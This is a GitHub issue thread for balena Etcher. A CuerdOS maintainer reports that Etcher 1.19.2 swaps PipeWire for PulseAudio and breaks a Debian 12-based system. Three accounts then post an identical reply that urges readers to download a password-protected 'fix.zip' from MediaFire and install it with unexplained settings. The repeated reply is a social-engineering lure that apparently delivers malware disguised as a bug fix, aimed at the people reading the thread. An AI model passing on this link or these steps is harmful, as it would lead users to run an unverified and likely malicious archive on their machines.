balena-io/etcher #4306: Last Balena Etcher deletes Pipewire

CuerdOS, 2024-08-26:
- Etcher version: 1.19.2
- Operating system and architecture: CuerdOS (Debian 12) x86_64
- What do you think should have happened: Etcher proceed to install Pulseaudio while uninstall Pipewire and breaks the OS installation
- What happened: One of our users reported the error because Etcher break his install
- What to do: Change Pulseaudio to Suggested and don't put it on Recommended

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mabhi02, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

scppuna, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."